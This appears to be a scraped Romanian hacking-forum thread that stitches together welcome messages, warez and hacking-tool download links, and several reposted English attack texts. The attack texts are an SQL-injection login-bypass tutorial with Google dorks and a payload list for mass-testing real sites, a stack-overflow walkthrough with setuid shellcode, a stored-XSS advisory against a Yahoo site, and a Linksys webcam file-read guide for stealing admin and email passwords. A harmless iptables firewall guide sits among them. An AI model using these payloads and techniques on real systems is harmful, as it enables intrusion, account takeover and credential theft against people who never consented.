zbeng

bun venit intre noi

uite cum arata ca descrie mie lene:p scz

5 june 2003 One of the major problems with SQL is its poor security issues surrounding is the login and url strings. this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works SEARCH: adminlogin.asp login.asp with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question WHAT I DO : first let me go into details on how i go about my research i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder INJECTION STRINGS:HOW ? this is the easiest part...very simple on the login page just enter something like user:admin (you dont even have to put this.) pass:' or 1=1-- or user:' or 1=1-- admin:' or 1=1-- some sites will have just a password so password:' or 1=1-- infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used there are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin UP paths...but thats another paper the one am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go thought 40 sites cutting and pasting each string ?? combo example: admin:' or a=a-- admin:' or 1=1-- and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection string now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever inurl:login.asp index of:/admin/login.asp like this: index of login.asp result: http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search 17,000 possible targets trying various searches spews out plent more now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so http://www.somesite.com/login.asp http://www.another.com/admin/login.asp and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into problems with users using Ares..thing is i know it works for me... sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable. there you go you should have access to your vulnerable target by now another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes user=' or 1=1-- just as quick as login process (Variations) admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a happy hunting

mamaa ce .....e prea tare...le a vazut cineva pe toATE?

aceasta arhiva contine:-apache hacker tool v2.0 apache h4x0r apache chunked scanner DOWNLOAD From : [url]http://rapidshare.ro/download.php?id=YwO6ULKBT5DG4QBzcdWK[/url]

UssrLabs found that the Mercur POP3 and IMAP Server is vulnerable to a Denial of Service attack. The attack is possible due to improper bounds checking. Details Vulnerable systems: MERCUR Mailserver 3.2 MERCUR POP3-Server (v3.20.01) for Windows NT MERCUR IMAP4-Server (v3.20.01) for Windows NT Example: $ telnet example.com 110 Trying example.com... Connected to example.com. Escape character is '^]'. +OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 M at 2000 03:30:39 -0300 user [buffer] Where [buffer] is approximately 2000 characters. $ telnet example.com 143 Trying example.com... Connected to example.com. Escape character is '^]'. * OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:34:09 -0300 [buffer] Where [buffer] is approximately 3000 characters. Exploit: Binary version of the POP3 DoS: http://www.ussrback.com/mercur/domrc32p.exe Binary version of the IMAP DoS: http://www.ussrback.com/mercur/domrc32i.exe Source code: http://www.ussrback.com/mercur/merc32ds.zip

in continuare va postez niste avatare care probabil unii membri lati vazut la kwe sau la alti membri si le ati vrut. CREATIE 100% ZBENG

daca pui chef si te pui la "invatat"vei reusi sa ajungi ca kwe sau ca cine vrei u ia si invata

orice program tre sa aiba descriere(parca asa era o regula din cate stiu)

sa cresti mare,is destu de fainute

bun venit intre noi

e bun de vro ceva?

Bun venit,nimeni nu e mare hacker dara totul are un inceut

noroc si bun venit pe aici ia si invata cea ce nu stii;)

title: vCAP calendar server Multiple vulnerability Author: securma massine <securma@morx.org> MorX Security Research Team http://www.morx.org Product info : vCAP (www.pscs.co.uk)is a network calendar server for Windows. vCAP allows user to create calendars which can be viewed and modified by people on network using a web browser. Original Advisory/PoC : http://www.morx.org/vcap.txt Severity: Medium/High - user can remotely attack the server Vulnerability Description: v1: denial of service attack with a specific request v2: directory traversal , any file on the system can be downloaded ,especially vCAp's passwords (vCAP.db) Affected Software(s): vCAP calendar server 1.9.0 Beta and prior Affected platform(s): Windows Exploit/Proof of Concept: v1- http://127.0.0.1:6100/StoresAndCalendarsLi...sion=%d%d%d%d%d v2- http://127.0.0.1:6100/../Data/vCAP.db Solution : ?? History: 16/08/2006 initial vendor contact 17/08/2006 sending vulnerability details 31/08/2006 vulnerability confirmed Disclaimer: this entire document is for eductional, testing and demonstrating purpose only.The author do not have any responsibility for any malicious use of this advisory or proof of concept code.

bun venit intre noi

ovidiu_ghe2001:cei ala procesor? mugurtop_9999: da stiu ce e procesor ovidiu_ghe2001: cei ia zimi mugurtop_9999: care gandeste

---------- start of vul.c -------------- /* vul.c by _6mO_HaCk */ #include <stdio.h> int main(int argc, char * argv[]) { char buffer[10]; if(argc < 2) { printf("Usage : %s buffern", argv[0]); exit(0); } strcpy(buffer,argv[1]); printf("ur buffer : %s", buffer); } ----------- end of vul.c --------------- lets try now to overflow it [simo@localhost lab]$ gcc vul.c -o vul [simo@localhost lab]$ ./vul `perl -e 'print "A" x 20'` ur buffer : AAAAAAAAAAAAAAAAAAAA 20 bytes and still not able to overflow it, lets put a bigger buffer [simo@localhost lab]$ ./vul `perl -e 'print "A" x 30'` Segmentation fault (core dumped) we did it, we were able to overflow lets try now to see what happened using our favorite debugger gdb [simo@localhost lab]$ gdb -c core ./vul GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... Core was generated by `./vul AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x40003e40 in process_envvars (modep=Cannot access memory at address 0x41414149 ) at rtld.c:1463 1463 rtld.c: No such file or directory. in rtld.c (gdb) info reg eip eip 0x40003e40 0x40003e40 (gdb) info reg ebp ebp 0x41414141 0x41414141 as u see unfortunatly we were able just to rewrite the ebp (extended base pointer ) address while we couldnt rewrite eip (extended instruction pointer) seems we still need a bigger buffer let's retry with a bigger buffer size [simo@localhost lab]$ ./vul `perl -e 'print "A" x 32'` Segmentation fault (core dumped) [simo@localhost lab]$ gdb -c core ./vul GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... Core was generated by `./vul AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) info reg ebp ebp 0x41414141 0x41414141 (gdb) info reg eip eip 0x41414141 0x41414141 (gdb) q well this time we did it, with a 32 buffer we were able to overwrite both eip and ebp with our new address 0x41414141 where 41 is the hex value for the ascii caracter "A" next step now is to find our shellcode return address, for that we will have to load an eggshell into our environment and then overflow the vulnerable program and find the shellcode return address a simple eggshell that i have written with setuid shellcode -------------------------- start eggshell.c ---------------------------- include <stdio.h> #define NOP 0x90 /* our nops (no operations) */ char shellcode[] = "x31xc0x31xdbxb0x17xcdx80" /* setuid() (not mine) */ "xebx5ax5ex31xc0x88x46x07x31xc0x31xdbxb0x27xcd" "x80x85xc0x78x32x31xc0x31xdbx66xb8x10x01xcdx80" "x85xc0x75x0fx31xc0x31xdbx50x8dx5ex05x53x56xb0" "x3bx50xcdx80x31xc0x8dx1ex89x5ex08x89x46x0cx50" "x8dx4ex08x51x56xb0x3bx50xcdx80x31xc0x8dx1ex89" "x5ex08x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c" "xcdx80xe8xa1xffxffxffx2fx62x69x6ex2fx73x68"; int main(void) { char eggshell[512]; puts("eggshell by _6mO_HaCk, loaded into environment"); memset(eggshell,NOP,512); memcpy(&eggshell[512-strlen(shellcode)],shellcode,strlen(shellcode)); setenv("EGG", eggshell, 1); putenv(eggshell); system("/bin/bash"); return(0); } --------------------------- end eggshell.c ----------------------------- [simo@localhost lab]$ gcc eggshell.c -o eggshell; ./eggshell eggshell by _6mO_HaCk, loaded into environment [simo@localhost lab]$ ./vul `perl -e 'print "A" x 32'` Segmentation fault (core dumped) [simo@localhost lab]$ gdb -c core ./vul GNU gdb 5.0rh-5 Red Hat Linux 7.1 Copyright 2001 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... Core was generated by `./vul'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) x/s $esp 0xbffff570: "" (gdb) 0xbffff571: "" (gdb) 0xbffff572: "" (gdb) 0xbffff573: "" (gdb) 0xbffff574: "Üõÿ¿äõÿ¿ö202

Authors: Simo64 and Simo Ben youssef Contacts : <simo64_at_morx_org> / <simo_at_morx_org> Discovered: 02 Aout 2006 Published: 17 Aout 2006 MorX Security Research Team Original Advisory: http://www.morx.org/YahooResearchMultiple.txt http://www.morx.org Service/Product: The Tech Buzz Game Vendors: Yahoo! Research and O'Reilly Media Vulnerability: Cross Site Scripting / Users Information Disclosure Severity: Law/Medium Tested on: Microsoft IE 6.0 firefox 1.5 and Opera      (should work on all browsers) Description: The Tech Buzz Game is a fledgling research project and demo, rather than a full-fledged Yahoo! product, and it's a product of Yahoo! Research and O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz scores are powered by Yahoo! Search technology and Yahoo! Search Web Services. The buzz scoring methodology was originally developed for the Yahoo! Buzz Index, which tracks web search spikes and trends for more details, visit: http://buzz.research.yahoo.com/dm/info/about.html Details: 1- Usernames disclosure the login2.html script is writting in a way to store users error information in login.html. if a user fails to sign in to the game, the error returned by login2.html with the username will be stored in login.html. login.html assign each request with an EID numerical value, in fact those information are accessible to anyone thru HTTP from login.htm source code <td valign="top" align="center" >    <form action=hlogin2.html method=post>    <input type=hidden name=cmd value=Domain.login>    <input type=hidden name=error.page value=login.html> <--- stores informations back in login.html Example: C:>nc buzz.research.yahoo.com 80 GET /dm/login/login.html?eid=100 HTTP/1.1 Host: 127.0.0.1 Connection: Closed HTTP/1.1 200 OK Date: Thu, 17 Aug 2006 14:40:46 GMT Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7 Transfer-Encoding: chunked Content-Type: text/html 1d84 --------------------- Scroll down ------------------------     <td align="left" scope="col">Username:</td>     <td align="left" scope="col"><input type="text" name="login" value='wil*******' /></td> <--- a previously stored yahoo ID     <td class="error" align="left" scope="col"></td> PoC: ]http://buzz.research.yahoo.com/dm/login/lo...random-numbers] 2- Permanent Cross Site Scripting: login2.html doesnt only store informations and make them accessible publicly thru login.html but also it fails to properly sanitize user-supplied input when passed thru the variable "login". after successful script injection the input will be stored in login.html with a specific EID example: C:>nc buzz.research.yahoo.com 80 POST /dm/login/login2.html HTTP/1.1 Host: 127.0.0.1 Content-Length: 78 Connection: Closed cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a HTTP/1.1 302 Found Date: Thu, 17 Aug 2006 15:10:47 GMT Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a Location: /dm/login/login.html?eid=182 Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 120 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved here. <HR> ok now lets get login.html?eid=182 to see if our script was filtered or no C:>nc buzz.research.yahoo.com 80 GET /dm/login/login.html?eid=182 HTTP/1.1 Host: 127.0.0.1 Connection: Closed HTTP/1.1 200 OK Date: Thu, 17 Aug 2006 13:14:18 GMT Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a Transfer-Encoding: chunked Content-Type: text/html 1d98 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> --------------------------Scroll Down ------------------------ Sorry, login failed.</td>      </tr>    <tr>     <td scope="col" align="left" colspan="4"></td>    </tr>    <tr>     <td scope="col" align="left"></td>     <td align="left" scope="col">Username:</td>     <td align="left" scope="col"><input type="text" name="login" value='''><script>alert("a")</script>' /></td> <--- not filtred PoC: http://www.morx.org/yahooXSSinject.html Note: the form will need the user to click to submit, an attacker may use a form which will auto-submit the js, using for example the onload attribute Impact: an attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authentified yahoo user in the context of the vulnerable yahoo website. resulting in the theft of cookie-based authentication giving the attacker full access to the victim's accounts (email box, etc) as well as other type of attacks. workaround: avoid clicking on links while being signed in yahoo Disclaimer: this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/Account. I cannot be held responsible for any of the above.

pote nu stii u sal folosesti bine dar e chiar FUARTE BUN

I. Finding a target. II. The problem. III. Accessing the Admin panel. IV. Finding emails and passwords. V. Conclusions. ######################## # I. Finding a target. # ######################## For this part of the tutorial, we'll utilize a simple google hack. If you search johnny.ihackstuff.com for Linksys Webcams you'll find something like this: inurl:main.cgi The search that I utilized was: inurl:main.cgi?next_file= The service may be running on any number of ports, but the most common ports that I've seen are ports 80 and 1024. #################### # II. The problem. # #################### Once you've found a webcam using google, open the link in your favorite web browser. You'll see something like this in your browser. http://127.0.0.1:1024/main.cgi?next_file=img/main.htm The problem that makes this hack possible is that main.cgi?next_file accepts any file, and reads it into the browser. So, obviously you could access /etc/passwd. http://127.0.0.1:1024/main.cgi?next_file=/etc/passwd But, we're going for something more interesting. ################################### # III. Accessing the Admin panel. # ################################### There are any number of ways the web interface could be setup, but this will only cover the default setup. Hacking any derivatives from this style should not be difficult at all. Just look at the HTML source code and find where the admin page urls are located. At the top of you page you will see a panel with something like this. Home View Video Setup Linksys WEB Help Exit Setup is the one we want. If you look at the source code you'll see that the link to setup is... http://127.0.0.1:1024/adm/file.cgi?next_file=basic.htm Clicking on the link prompts for the username and password of the router. Remember main.cgi? Yeah, well since we can read any file on the system we're going to load basic.htm, the setup panel, without needing a password. http://127.0.0.1:1024/main.cgi?next_file=adm/basic.htm Wow look at that. However, if you try to access something else from the regular administrative menu, you will be prompted for a user/pass combo. Now that we see how to load the menu, it's a trivial matter to obtain a legitimate password. http://127.0.0.1:1024/main.cgi?next_file=a...adm/pass_wd.htm Just look at the source code, around where the form is located and in plain text there is the user/pass. In order to access anything else in the admin menu, just open it up with main.cgi?next_file=adm/. Common Administrative Files. http://127.0.0.1:1024/main.cgi?next_file=system.htm http://127.0.0.1:1024/main.cgi?next_file=basic.htm http://127.0.0.1:1024/main.cgi?next_file=image.htm http://127.0.0.1:1024/main.cgi?next_file=pass_wd.htm http://127.0.0.1:1024/main.cgi?next_file=users.htm http://127.0.0.1:1024/main.cgi?next_file=status.htm http://127.0.0.1:1024/main.cgi?next_file=advanced.htm ###################################### # IV. Finding emails and passwords. # ###################################### One final interesting endeavor is to extract the password of the user's email account. There's an option in Linksys that allows it to email you when the motion sensor is set off. The user/pass of the email account may also be stored in plain text. http://127.0.0.1:1024/main.cgi?next_file=a...dm/advanced.htm ################### # V. Conclusions. # ################### I've only run into one webcam that successfully blocked this type of access. The result was a 403 webserver error. So if you want to keep your passwords safe you might want to look into file permissions and other forms of data protection for your web camera. ##################################################################### That's all for this article. I appreciate you reading this far. If you have any input/criticism please email me. stderr [dot] dev [at] gmail [dot] com. Shouts: cult, kaZm, SheepByte, and 34019. -stderr

Published on Pandora Security with permission, article author retains full copyright. This paper will concern the software package iptables by netfilter.org. It assumes you have installed a working iptables with the conntrack module. [glow=red,2,300] "Software inside this framework enables packet filtering, network address [and port] translation (NA[P]T) and other packet mangling. It is the re-designed and heavily improved successor of the previous Linux 2.2.x ipchains and Linux 2.0.x ipfwadm systems. [/glow] Main Features * stateless packet filtering (IPv4 and IPv6) * stateful packet filtering (IPv4) * all kinds of network address and port translation (NAT/NAPT) * flexible and extensible infrastructure * multiple layers of API's for 3rd party extensions * large number of plugins/modules kept in 'patch-o-matic' repository :endquote In my opinion with the right third party tools iptables can provide a stable, fast, and secure open source solution for any enterprise. There are many companies like www.smoothwall.org that base their services around iptables. This paper assumes you already have iptables installed with the right kernel modules present. Most Linux distributions have their own packages for iptables and I recomend installing it that way. To begin the command we use to configure iptables is of course 'iptables'. Now im not going to cover every little detail which can easily be found in the man page, 'man iptables', but I will tell you that iptables is a firewall based on rules which can be seen using 'iptables -L'. The output might look like... [glow=red,2,300]Chain INPUT (policy ACCEPT) target  prot opt source       destination    Chain FORWARD (policy ACCEPT) target  prot opt source       destination                   Chain OUTPUT (policy ACCEPT) target  prot opt source       destination  [/glow] As you can see iptables is broken up into _Chains_. While you can always add more there are essentially three main ones that are their by default. All originating packets destined for your machine start at the INPUT chain and is compared to each rule in that chain starting at the top. As soon as a rule matches a packet iptables applies the desired _Action_ to that packet. To flush all the rules from your firewall and start fresh like, the example above, type 'iptables -F'. As you can see the default policy on the INPUT chain is set to ACCEPT. This says that if a packet arrives that doesnt match any of the rules in the chain, we will accept the packet by default. As you can guess this isnt very secure so we will set the INPUT chain policy to DROP. This will drop all packets by default. [glow=red,2,300]#Clear the rules iptables -F #Tell the INPUT chain to drop all packets by default iptables -P INPUT DROP [/glow] Now we obviously want to let some traffic through but we also want strict control over what traffic gets in. Our first two rules will block all fragmented packets and packets that are in INVALID state. This will protect us from general unwanted traffic that may traverse itself to you. Also drop all incoming pings. [glow=red,2,300]#Block all fragmented packets. These guys restrict some information gathering techniques iptables -A INPUT -p all -f -j DROP #Block packets in state INVALID. Note: must have the conntrack module for this one iptables -A INPUT -p all -m conntrack --ctstate INVALID -j DROP #Block all incoming icmp type echo_request iptables -A INPUT -p icmp --icmp-type ping -j DROP #If you use irc you can speed up ident with this command, and if you dont use irc you SHOULD iptables -A INPUT -p tcp --dport 113 -j REJECT --reject-with icmp-port-unreachable [/glow] Now if you are running any services open those ports up now. Try to keep tcp and udp seperate. I have included two examples. [glow=red,2,300]#Accept incoming traffic to port 22 (ssh) iptables -A INPUT -p tcp --dport 22 -j ACCEPT #Accept all incoming UDP traffic to port 53 iptables -A INPUT -p udp --dport 53 -j ACCEPT #You pirates will have to open your own ports a'yar![/glow] The last step is to accept all your other normal traffic. This step also depends on the conntrack module for iptables. The idea here is to keep out all the traffic that doesnt belong. [glow=red,2,300]#Accept all tcp traffic in states RELATED and ESTABLISHED iptables -A INPUT -p tcp -m conntrack --ctstate RELATED,ESTABLISHED #Accept only ESTABLISHED udp traffic.  #note: This is how I make my DSL faster because my isp has misconfigured routers  #but is a good idea because it can prevent your machine from participating in a  #fraggle attack. iptables -A INPUT -p udp -m conntrack --ctstate ESTABLISHED #Accept all icmp traffic in states RELATED and ESTABLISHED iptables -A INPUT -p icmp -m conntrack --ctstate RELATED,ESTABLISHED[/glow] And thats it, check 'iptables -L' and make sure you entered all the commands in correctly. Most distributions have init scripts that can save your rules for you. I reccomend you use those. [glow=red,2,300] #In Gentoo to start iptables... /etc/init.d/iptables start #To stop iptables... /etc/init.d/iptables stop #To save your rules... /etc/init.d/iptables save #To start iptables everytime the system boots... rc-update add iptables default [/glow] This is not by all means the perfect firewall for everyone. No network is the same and I suggest reading 'man iptables' to see everything that iptables has to offer. The example rule-set for iptables is meant for a generic workstation or server. Dont let this be an end all solution for you, read 'man iptables'.

bun venit pe acilea

nu am poze duar am verificat linku-u DOWNLOAD [glow=red,2,300]http://rapidshare.de/files/27290390/600_PHP-Nuke_Themes.zip.html [/glow] PASSWORLD http://warezforum.info/

DOWNLOAD [glow=red,2,300] ]http://rapidshare.de/files/32225315/monste...1000.rar[/glow]